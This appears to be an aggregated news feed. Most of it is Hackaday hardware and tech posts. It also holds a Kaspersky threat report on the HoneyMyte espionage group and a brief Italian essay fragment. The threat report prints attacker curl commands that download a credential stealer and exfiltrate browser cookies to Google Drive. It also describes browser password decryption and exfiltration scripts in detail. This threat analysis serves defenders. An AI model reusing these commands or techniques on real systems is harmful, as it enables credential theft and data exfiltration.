For most people, calculators are cheap and simple devices used for little more than addition and the odd multiplication job. However, when you get into scientific and graphical calculators, the feature sets get a lot more interesting. For example, [Ready? Z80] has this excellent explainer on how HP’s older calculators handle infrared communications.

The video focuses on the HP 27S Scientific Calculator, which [Ready? Z80] found in an op-shop for just $5. Introduced in 1988, the HP-27S had the ability to dump screen data over an infrared link to a thermal printer to produce paper records of mundane high-school calculations or important engineering math. In the video, [Ready? Z80] explains the communication method with the aid of Hewlett-Packard’s own journal publication from October 1987, which lays out of the details of “the REDEYE Protocol.” Edgy stuff. It’s pretty straightforward to understand, with the calculator sending out bursts of data in six to eight pulses at a time, modulated onto a 32.768KHz square wave as is the norm. [Ready? Z80] then goes a step further, whipping up custom hardware to receive the signal and display the resulting data on a serial terminal. This is achieved with a TEC-1G single-board computer, based on the Z80 CPU, because that’s how [Ready? Z80] does things.

We’ve seen other great stuff from this channel before, too. For example, if you’ve ever wanted to multitask on the Z80, it’s entirely possible with the right techniques. Video after the break.

youtube.com/embed/FYOFi1Atyg0?…

hackaday.com/2026/01/27/how-hp…

Smoothie bikes are a great way to make a nutritious beverage while getting a workout at the same time. [Tony Goacher] was approached by a local college, though, which had a problem with this technology. Namely, that students were using them and leaving them filthy. They posed a simple question—could these bikes become something else?

[Tony’s] solution was simple—the bikes would be turned into game controllers. This was easily achieved by fitting a bi-color disc into the blender assembly. As the wheel on the bike turns, it spins up the blender, with the disc inside. An ESP32 microcontroller paired with a light sensor is then able to count pulses as the disc spins, getting a readout of the blender’s current RPM. Working backwards, this can then be calculated out into the bike’s simulated road speed and used to play a basic game on an attached Raspberry Pi. Notably, the rig is setup such that the Raspberry Pi and one bike connect to an access point hosted by the other bike. This is helpful, because it means neither bike has too many dangling cables that could get caught up in a wheel or chain.

We’ve seen many amusing game peripherals over the years, from salad spinners to turntables. Video after the break.

youtube.com/embed/tXwGMks4NyE?…

hackaday.com/2026/01/27/smooth…

Everyone knows that bearings are a consumable wear item, and that the power head of a vacuum likely contains bearings that will eventually need to be replaced. Yet when the manufacturer wants you to toss out the entire roller and pay $80 for the privilege, that feels rather steep and unnecessary. In the case of [Mark Furneaux], the roller in the power head of his Filter Queen brand vacuum felt particularly over the top to toss, since it’s all fancy wood with very durable brushes.

One of the bearings had stopped being a bearing, resulting in the plastic that held it in place beginning to melt. Fortunately the damage hadn’t progressed to the point where printing a replacement was necessary, so instead it was time to figure out how to remove the bearings without permanent damage. The trick that the manufacturer used was to peen the ends of the metal shafts that the bearings fit onto, requiring some Dremel action to convince them to come off.

After some careful modifications like this, the remnants of the old bearings came off and their replacements could go on. Due to the metal shaft modifications, it is now mostly the plastic caps on either end which grip the bearings, but it seems to work well enough. For $2 in bearings and some labor on [Mark]’s end, he managed to keep a perfectly good roller brush out of the landfill, and future bearing replacements should be much easier.

youtube.com/embed/oEJ6OIHEAjc?…

hackaday.com/2026/01/27/servic…

When you can buy something at a low price in one location, and sell it at a higher price somewhere else, you’re engaged in what economists call “arbitrage”. We’re not sure if desoldering DDR5 chips from laptop SO-DIMMs to populate a custom PCB to create much-more-expensive desktop memory counts as arbitrage, but it certainly counts as a hack. [VIK-on], who built the cards, claims he’s getting DDR5 performance at almost DDR3 prices. Nice!

Installed, the RAM apparently works well, though [VIK-on] has not shared benchmarks.Specifically, he’s put together a 32 GB UDIMM from donor chips from two 16 GB SO-DIMMs. The memory chips themselves aren’t enough to make a stick of RAM, however: the part where we wish we had more details was in the firmware. The firmware identifies this DIY DIMM as an ADATA AX5U6500C3232G-DCLARWH, specifically. [VIK-on] is still performing stability tests, if those go well, we’re told to expect a how-to guide.

[VIK-on] is in Russia, so SO-DIMM rates may differ in your local market, but he claims walkaway costs of 17,015 ₽ — about $218 or €188, an astounding price for DDR5 in these dark days.

Some say soldering SIMMs seems severe, but hardly strange to Hackaday, and desperate times call for desperate measures. It’s ether that or optimize software, and who wants go to that effort?

hackaday.com/2026/01/27/post-r…

The human body is remarkably good at handling repairs. Cut the skin, and the blood will clot over the wound and the healing process begins. Break a bone, and the body will knit it back together as long as you keep it still enough. But teeth? Our adult teeth get damaged all the time, and yet the body has almost no way to repair them at all. Get a bad enough cavity or knock one out, and it’s game over. There’s nothing to be done but replace it.

Finding a way to repair teeth without invasive procedures has long been a holy grail for dental science. A new treatment being developed in Japan could help replace missing teeth in the near future.

The Tooth

Using an antibody treatment to suppress USAG-1 in ferrets led to the development of supernumerary teeth. In regular speak, that means “more teeth than you would typically expect a ferret to have.” Credit: Research paper
In the course of normal development, humans grow a set of baby teeth, followed by a set of adult or “permanent” teeth. Conventional wisdom tells us that this second set is all we get, and that we should properly care for them if we hope to hang on to them for life. Physical injury can knock them out, and a lack of dental hygiene can see them badly damaged to the point where they have to be removed. Thus, there are plenty of incentives to take care of one’s teeth, given that there is little to be done beyond replacing them with clumsy dentures if they fail us.

Researchers in Japan may have figured out a workaround, however. A gene called uterine sensitization–associated gene-1 (USAG-1) was identified to play a role in stopping the growth of teeth in small mammals like mice and ferrets. In turn, it was determined that by inhibiting the interaction between proteins generated by USAG-1 and bone morphgenetic protein (BMP) molecules, it was possible to make dental growth resume. The perceived link is relatively simple—suppress USAG-1, and kickstart the tooth generation process. The hope is that using an antibody to do this would then lead to the spontaneous development of healthy adult teeth.

Research suggests that humans may have an extra set of teeth “buds” lurking in the jaw that normally lay dormant; it could be as simple as activating them to produce new teeth as needed. Thus, the concept is sometimes referred to as growing “the third tooth”—in that a regenerated tooth would be the third tooth after the original baby and adult teeth. Particularly as human lifespans grow longer, the ability to produce a third set of teeth becomes more valuable. However, the technique won’t just be useful for people that break a tooth or lose one to excessive acid wear or associated damage. Indeed, an early focus of the work is to help individuals with conditions like congenital anodontia, wherein a patient never grew a full set of mature permanent teeth. The aim is that the treatment could stimulate the growth of strong, adult-grade teeth to improve the quality of life for those with the condition.
It’s believed humans may have buds for a third set of teeth already lurking, just waiting to be activated. Credit: research paper
With early stage trials in mice completed some time ago, the treatment remains in early stage clinical trials for humans. An initial trial tested the treatment on adult males from 30 to 64 years old who were missing at least one tooth. This was with the hope that if growth did occur, it would ideally be limited to the missing slot, rather than causing new growth in areas that would push out existing healthy teeth. The next stage of trials will involve young children from ages 2 to 7 who are missing at least four teeth, to test the treatment on those with a congenital tooth deficiency. It’s likely that testing will also aim to determine just how USAG-1 suppression influences tooth regrowth. Ideally, it would only occur in specific areas where teeth were missing. It would be a great disaster if the treatment led to widespread tooth regrowth, which could cause crowding issues or loss of healthy teeth.

Right now, taking a pill or injection to regrow entire teeth seems like science fiction. However, if it does turn out that merely supressing some proteins is enough to get the body’s own tooth factory rolling again, it could be a game changer. There’s hope yet for all, except perhaps those that make their business in selling dentures.

hackaday.com/2026/01/27/regrow…

In 1993, DOOM was a great game to play if you had a 486 with a VGA monitor and nothing to do all weekend. In 2026, you can play it on a set of earbuds instead, if for some reason that’s something you’ve always dreamed of doing.

The project comes to us from [Arin Sarkisian], who figured out that the Pinebuds Pro had enough processing power to run one of the seminal FPS games from the 1990s. Inside these earbuds is a Cortex-M4F, which is set to run at 100 MHz. [Arin] figured out it could easily be cranked up to 300 MHz with low power mode switched off, which would come in handy for one main reason. See, the earbuds might be able to run the DOOM engine, but they don’t have a display.

Thus, [Arin] figured the easiest way to get the video data out would be via the Cortex-M4F’s serial UART running at 2.4 mbps. Running the game at a resolution of 320 x 200 at 3 frames per second would consume this entire bandwidth. However, all those extra clock cycles allow running an MJPEG compression algorithm that allow spitting out up to 18 frames per second. Much better!

All that was left to do was to figure out a control scheme. To that end, a web server is set up off-board that passes key presses to the buds and accepts and displays the MJPEG stream to the player. If you’re so inclined you can even play the game yourself on the project website, though you might just have to get in a queue. In the meantime, you can watch the Twitch stream of whoever else is playing at the time.

Files are on GitHub—both the earbud firmware and the web interface used to play the game. It was perhaps only a matter of time until we saw DOOM on earbuds; no surprise given that we’ve already seen it played on everything from receipt printers to cookware. No matter how cliche, we’re going to keep publishing interesting DOOM ports—so keep them coming to the tipsline.

Thanks to [alialiali] for the tip!

hackaday.com/2026/01/27/runnin…

The very concept of the web browser began with a humble piece of software called NCSA Mosaic, all the way back in 1993. It was soon eclipsed by Netscape Navigator, and later Internet Explorer, which became the titans of the 1990s browser market. In turn, they too would falter. Navigator’s dying corpse ended up feeding what would become Mozilla Firefox, and Internet Explorer later morphed into the unexceptional browser known as Edge.

Few of us have had any reason to think about Netscape Navigator since its demise in 2008. And yet, the name lingers on. A zombie from a forgotten age, risen again to haunt us today.

The Bigger They Are, The Harder They Fall

Netscape Navigator was once the browser to use, dominating its rivals with a 90% market share. Unfortunately, that reign of glory only lasted until the last few years of the 1990s, when Internet Explorer began to embrace, extend, and extinguish. Explorer was included with every copy of Windows sold, it was distributed by AOL and minor ISPs alike, and it was better at keeping up with, or outright creating, new standards at a time when Netscape’s developers became stuck in the quagmire of an an increasingly aging codebase.

Netscape was great right through the 4.0s, but Netscape 5 was cancelled, and Netscape 6 was a mess. The company was bought out by AOL, and the product limped on into the early 2000s, but it was eventually declared dead on March 1, 2008. With almost no user base to speak of at that point, it simply did not make sense to continue.

You might think, then, that the Netscape name died with the browser and that it would never be seen or heard again. Unfortunately, that’s almost never the case when it comes to recognizable names in the tech world. Somebody always seems to hang on to the rights to do something with them, even if it’s usually unsuccessful. Sometimes it goes well, but more often than not, it amounts to little more than a hackneyed old logo slapped on a product that nobody really cares about.
Connect to the Internet by dialing up the Netscape ISP! Ironically founded several years after the browser ceased to be relevant at all. Credit: Netscape ISP via Web Archive
In the case of Netscape, the branding rights became AOL’s when it first purchased the business in 1998. It would go on to use the name to start a dial-up ISP in 2004, called Netscape Internet Service. It’s unclear precisely why this was done, given that AOL already was an ISP in its own right, which ran dial-up service all the way up until September 2025.

But for whatever reason, Netscape ISP kicked off operations on January 8, 2004, initially offering unlimited use for just $9.95 a month. Notably, it seems the name was the point—with the barebones site noting that you were getting a “reliable Internet connection from a name you trust.” It was also somewhat different from the contemporary AOL offering, in that you didn’t need a CD full of bloatware to access the service. The signup site went so far as to explain that you didn’t need to use a Netscape Navigator browser to access the service; any would do. As a cool bonus, you got a sweet “@netscape.com” email address when you signed up.
Even in 2016, the Netscape ISP was still offering dial-up connections only. However, you could get additional netscape.com email addresses for an extra $2.00 a month, along with various other add-ons of questionable value. Credit: Netscape ISP via Web Archive
The Netscape ISP maintained its cheap offering for many years. It also later added “Web Accelerator,” which was a simple compression tool that promised to let you surf the web “up to 5x faster.” In reality, it was marketing fluff that did not make a lot of difference to dial-up users chugging along on slow connections. Weirdly, the Netscape ISP never transitioned over to selling DSL or fiber or any sort of modern broadband connection. As recently as 2018, you could still sign up for a service that was entirely dial-up only. Eventually, at some point in the late 2010s or early 2020s, Netscape ISP appeared to stop accepting new signups, with the main webpage (isp.netscape.com) eventually turning into a generic news aggregator. It remains in that state today at the time of writing.

Perhaps the most hilarious part of the Netscape ISP story, though, is that it eventually spawned its own browser. Somewhere deep in the bowels of an AOL office, some poor developer had to hack together a Chromium fork to slap the Netscape ISP branding on it. You can still download it today, thanks to a link lurking on the bottom of the Netscape ISP site. We gave it a look.
The Netscape ISP page as it stands in 2026. This format has been used on the site since at least 2022; it appears the ISP stopped accepting new customers some years prior. Credit: isp.netscape.com
Hilariously, it’s an amalgamation of so many dying names from the early Internet—the privacy policy is hosted on Yahoo, because the now-defunct search engine merged with AOL in 2015. The browser is very obviously a reskinned version of Chromium from mid-2024, with a bit of AOL search bloatware thrown in for good measure.

While you can still download the silly 2024 “Netscape” browser, you can’t use the ISP anymore. That’s because AOL killed it dead in November 2025. Affected users will be able to maintain their super-cool netscape.com email addresses, but no more will you be able to dial up to access the Internet with your Netscape ISP account. To ease the change, AOL offered to transition affected users over to the “Complete by AOL” service, while also recommending alternatives like Starlink, HughesNet, Dialup4Less.com, and T-Mobile and Verizon 5G home internet plans. Yes, even in late 2025, your dying dial-up ISP was willing to recommend another that still operates on the old-fashioned phone lines, just as our ancestors intended.

One thing we’d love to see are the user statistics for the Netscape ISP over the past two decades. It’s hard to imagine there were a whole lot of people that were inconvenienced when AOL’s random off-shoot dial-up ISP went down in November 2025. It has to be some tiny figure, even less than the number of dial-up users that were still on the company’s main service, which shut down a month earlier. Still, they felt the need to issue a notice to users, so somebody must still have been calling in now and then, using their glacial 56K connection to check the weather and catch up on the latest updates in the Ivy League squash standings.

In any case, save for a tired old website and a rapidly-aging port of Chrome, Netscape is finally dead. For good this time. Until the logo turns up on a bunch of smart TVs and a badly-rebadged smartphone, or something. Until then, the big N shall hopefully be laid to rest.

With the powerful off-the-shelf hardware available to us common hardware hobbyist folk, how hard can it be to make a smartphone from scratch? Hence [V Electronics]’s Spirit smartphone project, with the video from a few months ago introducing the project.

As noted on the hardware overview page, everything about the project uses off the shelf parts and modules, except for the Raspberry Pi Compute Module 5 (CM5) carrier board. The LCD is a 5.5″, 1280×720 capacitive one currently, but this can be replaced with a compatible one later on, same as the camera and the CM5 board, with the latter swappable with any other CM5 or drop-in compatible solution.

The star of the show and the thing that puts the ‘phone’ in ‘smartphone’ is the Quectel EG25-GL LTE (4G) and GPS module which is also used in the still-not-very-open PinePhone. Although the design of the carrier board and the 3D printable enclosure are still somewhat in flux, the recent meeting notes show constant progress, raising the possibility that with perhaps some community effort this truly open hardware smartphone will become a reality.

youtube.com/embed/OgMdO0ckICg?…

Thanks to [tiel] for the tip.

hackaday.com/2026/01/27/pi-com…

Over the past few years, we’ve been observing and monitoring the espionage activities of HoneyMyte (aka Mustang Panda or Bronze President) within Asia and Europe, with the Southeast Asia region being the most affected. The primary targets of most of the group’s campaigns were government entities.

As an APT group, HoneyMyte uses a variety of sophisticated tools to achieve its goals. These tools include ToneShell, PlugX, Qreverse and CoolClient backdoors, Tonedisk and SnakeDisk USB worms, among others. In 2025, we observed HoneyMyte updating its toolset by enhancing the CoolClient backdoor with new features, deploying several variants of a browser login data stealer, and using multiple scripts designed for data theft and reconnaissance.

Additional information about this threat, including indicators of compromise, is available to customers of the Kaspersky Intelligence Reporting Service. If you are interested, please contact intelreports@kaspersky.com.

CoolClient backdoor

An early version of the CoolClient backdoor was first discovered by Sophos in 2022, and TrendMicro later documented an updated version in 2023. Fast forward to our recent investigations, we found that CoolClient has evolved quite a bit, and the developers have added several new features to the backdoor. This updated version has been observed in multiple campaigns across Myanmar, Mongolia, Malaysia and Russia where it was often deployed as a secondary backdoor in addition to PlugX and LuminousMoth infections.

In our observations, CoolClient was typically delivered alongside encrypted loader files containing encrypted configuration data, shellcode, and in-memory next-stage DLL modules. These modules relied on DLL sideloading as their primary execution method, which required a legitimate signed executable to load a malicious DLL. Between 2021 and 2025, the threat actor abused signed binaries from various software products, including BitDefender, VLC Media Player, Ulead PhotoImpact, and several Sangfor solutions.

Variants of CoolClient abusing different software for DLL sideloading (2021–2025)

The latest CoolClient version analyzed in this article abuses legitimate software developed by Sangfor. Below, you can find an overview of how it operates. It is worth noting that its behavior remains consistent across all variants, except for differences in the final-stage features.

Overview of CoolClient execution flow

However, it is worth noting that in another recent campaign involving this malware in Pakistan and Myanmar, we observed that HoneyMyte has introduced a newer variant of CoolClient that drops and executes a previously unseen rootkit. A separate report will be published in the future that covers the technical analysis and findings related to this CoolClient variant and the associated rootkit.

CoolClient functionalities

In terms of functionality, CoolClient collects detailed system and user information. This includes the computer name, operating system version, total physical memory (RAM), network details (MAC and IP addresses), logged-in user information, and descriptions and versions of loaded driver modules. Furthermore, both old and new variants of CoolClient support file upload to the C2, file deletion, keylogging, TCP tunneling, reverse proxy listening, and plugin staging/execution for running additional in-memory modules. These features are still present in the latest versions, alongside newly added functionalities.

In this latest variant, CoolClient relies on several important files to function properly:

Parameter modes in second-stage DLL

CoolClient typically requires three parameters to function properly. These parameters determine which actions the malware is supposed to perform. The following parameters are supported.

Final stage DLL

The write.exe process decrypts and launches the main.dat file, which contains the third (final) stage DLL. CoolClient’s core features are implemented in this DLL. When launched, it first checks whether the keylogger, clipboard stealer, and HTTP proxy credential sniffer are enabled. If they are, CoolClient creates a new thread for each specific functionality. It is worth noting that the clipboard stealer and HTTP proxy credential sniffer are new features that weren’t present in older versions.

Clipboard and active windows monitor

A new feature introduced in CoolClient is clipboard monitoring, which leverages functions that are typically abused by clipboard stealers, such as GetClipboardData and GetWindowTextW, to capture clipboard information.

CoolClient also retrieves the window title, process ID and current timestamp of the user’s active window using the GetWindowTextW API. This information enables the attackers to monitor user behavior, identify which applications are in use, and determine the context of data copied at a given moment.

The clipboard contents and active window information are encrypted using a simple XOR operation with the byte key 0xAC, and then written to a file located at C:\ProgramData\AppxProvisioning.xml.

HTTP proxy credential sniffer

Another notable new functionality is CoolClient’s ability to extract HTTP proxy credentials from the host’s HTTP traffic packets. To do so, the malware creates dedicated threads to intercept and parse raw network traffic on each local IP address. Once it is able to intercept and parse the traffic, CoolClient starts extracting proxy authentication credentials from HTTP traffic intercepted by the malware’s packet sniffer.

The function operates by analyzing the raw TCP payload to locate the Proxy-Connection header and ensure the packet is relevant. It then looks for the Proxy-Authorization: Basic header, extracts and decodes the Base64-encoded credential and saves it in memory to be sent later to the C2.

Function used to find and extract Base64-encoded credentials from HTTP proxy-authorization headers

C2 command handler

The latest CoolClient variant uses TCP as the main C2 communication protocol by default, but it also has the option to use UDP, similar to the previous variant. Each incoming payload begins with a four-byte magic value to identify the command family. However, if the command is related to downloading and running a plugin, this value is absent. If the client receives a packet without a recognized magic value, it switches to plugin mode (mechanism used to receive and execute plugin modules in memory) for command processing.

0xFFAABBCC – Beacon and configuration commands

Below is the command menu to manage client status and beaconing:

0xFFAABBCD – Operational commands

This command group implements functionalities such as data theft, proxy setup, and file manipulation. The following is a breakdown of known subcommands:

CoolClient plugins

CoolClient supports multiple plugins, each dedicated to a specific functionality. Our recent findings indicate that the HoneyMyte group actively used CoolClient in campaigns targeting Mongolia, where the attackers pushed and executed a plugin named FileMgrS.dll through the C2 channel for file management operations.

Further sample hunting in our telemetry revealed two additional plugins: one providing remote shell capability (RemoteShellS.dll), and another focused on service management (ServiceMgrS.dll).

ServiceMgrS.dll – Service management plugin

This plugin is used to manage services on the victim host. It can enumerate all services, create new services, and even delete existing ones. The following table lists the command IDs and their respective actions.

FileMgrS.dll – File management plugin

A few basic file operations are already supported in the operational commands of the main CoolClient implant, such as listing directory contents and deleting files. However, the dedicated file management plugin provides a full set of file management capabilities.

RemoteShellS.dll – Remote shell plugin

Based on our analysis of the main implant, the C2 command handler did not implement remote shell functionality. Instead, CoolClient relied on a dedicated plugin to enable this capability. This plugin spawns a hidden cmd.exe process, redirecting standard input and output through pipes, which allows the attacker to send commands into the process and capture the resulting output. This output is then forwarded back to the C2 server for remote interaction.

CoolClient plugin that spawns cmd.exe with redirected I/O and forwards command output to C2

Browser login data stealer

While investigating suspicious ToneShell backdoor traffic originating from a host in Thailand, we discovered that the HoneyMyte threat actor had downloaded and executed a malware sample intended to extract saved login credentials from the Chrome browser as part of their post-exploitation activities. We will refer to this sample as Variant A. On the same day, the actor executed a separate malware sample (Variant B) targeting credentials stored in the Microsoft Edge browser. Both samples can be considered part of the same malware family.

During a separate threat hunting operation focused on HoneyMyte’s QReverse backdoor, we retrieved another variant of a Chrome credential parser (Variant C) that exhibited significant code similarities to the sample used in the aforementioned ToneShell campaign.

The malware was observed in countries such as Myanmar, Malaysia, and Thailand, with a particular focus on the government sector.

The following table shows the variants of this browser credential stealer employed by HoneyMyte.

These stealers may be part of a new malware toolset used by HoneyMyte during post-exploitation activities.

Initial infection

As part of post-exploitation activity involving the ToneShell backdoor, the threat actor initially executed the Variant A stealer, which targeted Chrome credentials. However, we were unable to determine the exact delivery mechanism used to deploy it.

A few minutes later, the threat actor executed a command to download and run the Variant B stealer from a remote server. This variant specifically targeted Microsoft Edge credentials.
curl hxxp://45.144.165[.]65/BUIEFuiHFUEIuioKLWENFUoi878UIESf/MUEWGHui897hjkhsjdkHfjegfdh/67jksaebyut8seuhfjgfdgdfhet4SEDGF/Tools/getlogindataedge.exe -o "C:\users\[username]\libraries\getloginedge.exe"
Within the same hour that Variant B was downloaded and executed, we observed the threat actor issue another command to exfiltrate the Firefox browser cookie file (cookies.sqlite) to Google Drive using a curl command.
curl -X POST -L -H "Authorization: Bearer ya29.a0Ad52N3-ZUcb-ixQT_Ts1MwvXsO9JwEYRujRROo-vwqmSW006YxrlFSRjTuUuAK-u8UiaQt7v0gQbjktpFZMp65hd2KBwnY2YdTXYAKhktWi-v1LIaEFYzImoO7p8Jp01t29_3JxJukd6IdpTLPdXrKINmnI9ZgqPTWicWN4aCgYKAQ4SARASFQHGX2MioNQPPZN8EkdbZNROAlzXeQ0174" -F "metadata={name :'8059cookies.sqlite'};type=application/json;charset=UTF-8" -F "file=@"$appdata\Mozilla\Firefox\Profiles\i6bv8i9n.default-release\cookies.sqlite";type=application/zip" -k "https://www.googleapis.com/upload/drive/v3/files?uploadType=multipart"

Variant C analysis

Unlike Variants A and B, which use hardcoded file paths, the Variant C stealer accepts two runtime arguments: file paths to the browser’s Login Data and Local State files. This provides greater flexibility and enables the stealer to target any Chromium-based browser such as Chrome, Edge, Brave, or Opera, regardless of the user profile or installation path. An example command used to execute Variant C is as follows:
Jarte.exe "C:\Users\[username]\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\[username]\AppData\Local\Google\Chrome\User Data\Local State"
In this context, the Login Data file is an SQLite database that stores saved website login credentials, including usernames and AES-encrypted passwords. The Local State file is a JSON-formatted configuration file containing browser metadata, with the most important value being encrypted_key, a Base64-encoded AES key. It is required to decrypt the passwords stored in the Login Data database and is also encrypted.

When executed, the malware copies the Login Data file to the user’s temporary directory as chromeTmp.

Function that copies Chrome browser login data into a temporary file (chromeTmp) for exfiltration

To retrieve saved credentials, the malware executes the following SQL query on the copied database:
SELECT origin_url, username_value, password_value FROM logins
This query returns the login URL, stored username, and encrypted password for each saved entry.

Next, the malware reads the Local State file to extract the browser’s encrypted master key. This key is protected using the Windows Data Protection API (DPAPI), ensuring that the encrypted data can only be decrypted by the same Windows user account that created it. The malware then uses the CryptUnprotectData API to decrypt this key, enabling it to access and decrypt password entries from the Login Data SQLite database.

With the decrypted AES key in memory, the malware proceeds to decrypt each saved password and reconstructs complete login records.

Finally, it saves the results to the text file C:\Users\Public\Libraries\License.txt.

Login data stealer’s attribution

Our investigation indicated that the malware was consistently used in the ToneShell backdoor campaign, which was attributed to the HoneyMyte APT group.
Another factor supporting our attribution is that the browser credential stealer appeared to be linked to the LuminousMoth APT group, which has previously been connected to HoneyMyte. Our analysis of LuminousMoth’s cookie stealer revealed several code-level similarities with HoneyMyte’s credential stealer. For example, both malware families used the same method to copy targeted files, such as Login Data and Cookies, into a temporary folder named ChromeTmp, indicating possible tool reuse or a shared codebase.

Code similarity between HoneyMyte’s saved login data stealer and LuminousMoth’s cookie stealer

Both stealers followed the same steps: they checked if the original Login Data file existed, located the temporary folder, and copied the browser data into a file with the same name.

Based on these findings, we assess with high confidence that HoneyMyte is behind this browser credential stealer, which also has a strong connection to the LuminousMoth APT group.

Document theft and system information reconnaissance scripts

In several espionage campaigns, HoneyMyte used a number of scripts to gather system information, conduct document theft activities and steal browser login data. One of these scripts is a batch file named 1.bat.

1.bat – System enumeration and data exfiltration batch script

The script starts by downloading curl.exe and rar.exe into the public folder. These are the tools used for file transfer and compression.

Batch script that downloads curl.exe and rar.exe from HoneyMyte infrastructure and executes them for file transfer and compression

It then collects network details and downloads and runs the nbtscan tool for internal network scanning.

Batch script that performs network enumeration and saves the results to the log.dat file for later exfiltration

During enumeration, the script also collects information such as stored credentials, the result of the systeminfo command, registry keys, the startup folder list, the list of files and folders, and antivirus information into a file named log.dat. It then uploads this file via FTP to http://113.23.212[.]15/pub/.

Batch script that collects registry, startup items, directories, and antivirus information for system profiling

Next, it deletes both log.dat and the nbtscan executable to remove traces. The script then terminates browser processes, compresses browser-related folders, retrieves FileZilla configuration files, archives documents from all drives with rar.exe, and uploads the collected data to the same server.

Finally, it deletes any remaining artifacts to cover its tracks.

Ttraazcs32.ps1 – PowerShell-based collection and exfiltration

The second script observed in HoneyMyte operations is a PowerShell file named Ttraazcs32.ps1.

Similar to the batch file, this script downloads curl.exe and rar.exe into the public folder to handle file transfers and compression. It collects computer and user information, as well as network details such as the public IP address and Wi-Fi network data.

All gathered information is written to a file, compressed into a password-protected RAR archive and uploaded via FTP.

In addition to system profiling, the script searches multiple drives including C:\Users\Desktop, Downloads, and drives D: to Z: for recently modified documents. Targeted file types include .doc, .xls, .pdf, .tif, and .txt, specifically those changed within the last 60 days. These files are also compressed into a password-protected RAR archive and exfiltrated to the same FTP server.

t.ps1 – Saved login data collection and exfiltration

The third script attributed to HoneyMyte is a PowerShell file named t.ps1.

The script requires a number as a parameter and creates a working directory under D:\temp with that number as the directory name. The number is not related to any identifier. It is simply a numeric label that is probably used to organize stolen data by victim. If the D drive doesn’t exist on the victim’s machine, the new folder will be created in the current working directory.

The script then searches the system for Chrome and Chromium-based browser files such as Login Data and Local State. It copies these files into the target directory and extracts the encrypted_key value from the Local State file. It then uses Windows DPAPI (System.Security.Cryptography.ProtectedData) to decrypt this key and writes the decrypted Base64-encoded key into a new file named Local State-journal in the same directory. For example, if the original file is C:\Users\$username \AppData\Local\Google\Chrome\User Data\Local State, the script creates a new file C:\Users\$username\AppData\Local\Google\Chrome\User Data\Local State-journal, which the attacker can later use to access stored credentials.

PowerShell script that extracts and decrypts the Chrome encrypted_key from the Local State file before writing the result to a Local State-journal file

Once the credential data is ready, the script verifies that both rar.exe and curl.exe are available. If they are not present, it downloads them directly from Google Drive. The script then compresses the collected data into a password-protected archive (the password is “PIXELDRAIN”) and uploads it to pixeldrain.com using the service’s API, authenticated with a hardcoded token. Pixeldrain is a public file-sharing service that attackers abuse for data exfiltration.

Script that compresses data with RAR, and exfiltrates it to Pixeldrain via API

This approach highlights HoneyMyte’s shift toward using public file-sharing services to covertly exfiltrate sensitive data, especially browser login credentials.

Conclusion

Recent findings indicate that HoneyMyte continues to operate actively in the wild, deploying an updated toolset that includes the CoolClient backdoor, a browser login data stealer, and various document theft scripts.

With capabilities such as keylogging, clipboard monitoring, proxy credential theft, document exfiltration, browser credential harvesting, and large-scale file theft, HoneyMyte’s campaigns appear to go far beyond traditional espionage goals like document theft and persistence. These tools indicate a shift toward the active surveillance of user activity that includes capturing keystrokes, collecting clipboard data, and harvesting proxy credential.

Organizations should remain highly vigilant against the deployment of HoneyMyte’s toolset, including the CoolClient backdoor, as well as related malware families such as PlugX, ToneShell, Qreverse, and LuminousMoth. These operations are part of a sophisticated threat actor strategy designed to maintain persistent access to compromised systems while conducting high-value surveillance activities.

Indicators of compromise

CoolClient
F518D8E5FE70D9090F6280C68A95998F libngs.dll
1A61564841BBBB8E7774CBBEB3C68D5D loader.dat
AEB25C9A286EE4C25CA55B72A42EFA2C main.dat
6B7300A8B3F4AAC40EEECFD7BC47EE7C time.dat

CoolClient plugins
7AA53BA3E3F8B0453FFCFBA06347AB34 ServiceMgrS.dll
A1CD59F769E9E5F6A040429847CA6EAE FileMgrS.dll
1BC5329969E6BF8EF2E9E49AAB003F0B RemoteShellS.dll

Browser login data stealer
1A5A9C013CE1B65ABC75D809A25D36A7 Variant A
E1B7EF0F3AC0A0A64F86E220F362B149 Variant B
DA6F89F15094FD3F74BA186954BE6B05 Variant C

Scripts
C19BD9E6F649DF1DF385DEEF94E0E8C4 1.bat
838B591722512368F81298C313E37412 Ttraazcs32.ps1
A4D7147F0B1CA737BFC133349841AABA t.ps1

CoolClient C2
account.hamsterxnxx[.]com
popnike-share[.]com
japan.Lenovoappstore[.]com

FTP server
113.23.212[.]15

securelist.com/honeymyte-updat…

When last we saw [xoreaxeax], he had built a lens-less optical microscope that deduced the structure of a sample by recording the diffraction patterns formed by shining a laser beam through it. At the time, he noted that the diffraction pattern was a frequency decomposition of the specimen’s features – in other terms, a Fourier transform. Now, he’s back with an explanation of why this is, deriving equations for the Fourier transform from the first principles of diffraction (German video, but with auto-translated English subtitles. Beware: what should be “Huygens principle” is variously translated as “squirrel principle,” “principle of hearing,” and “principle of the horn”).

The first assumption was that light is a wave that can be adequately represented by a sinusoidal function. For the sake of simplicity (you’ll have to take our word for this), the formula for a sine wave was converted to a complex number in exponential form. According to the Huygens principle, when light emerges from a point in the sample, it spreads out in spherical waves, and the wave at a given point can therefore be calculated simply as a function of distance. The principle of superposition means that whenever two waves pass through the same point, the amplitude at that point is the sum of the two. Extending this summation to all the various light sources emerging from the sample resulted in an infinite integral, which simplified to a particular form of the Fourier transform.

One surprising consequence of the relation is the JPEG representation of a micrograph of some onion cells. JPEG compression calculates the Fourier transform of an image and stores it as a series of sine-wave striped patterns. If one arranges tiles of these striped patterns according to stripe frequency and orientation, then shades each tile according to that pattern’s contribution to the final image, one gets a speckle pattern with a bright point in the center. This closely resembles the diffraction pattern created by shining a laser through those onion cells.

For the original experiment that generated these patterns, check out [xoreaxeax]’s original ptychographical microscope. Going in the opposite direction, researchers have also used physical structures to calculate Fourier transforms.

youtube.com/embed/zjw9lhaivTY?…

hackaday.com/2026/01/27/why-di…

La verità è un concetto mobile e sfuggente, i cui confini cambiano in relazione alla temperie culturale e all’azione dei soggetti che hanno i mezzi per costruirla e farla accettare.

Già nel V secolo però, Platone metteva in guardia i cittadini di Atene che per instaurare la democrazia bisognava cacciare i retori e i sofisti, che ingannano il popolo con sillogismi, paralogismi, notizie false e inventate.

Ma la società della comunicazione, basata su persuasione e populismo, non è in grado di scacciare i nuovi retori che assumono le vesti di imbonitori e tribuni di un popolo costruito algoritmicamente.

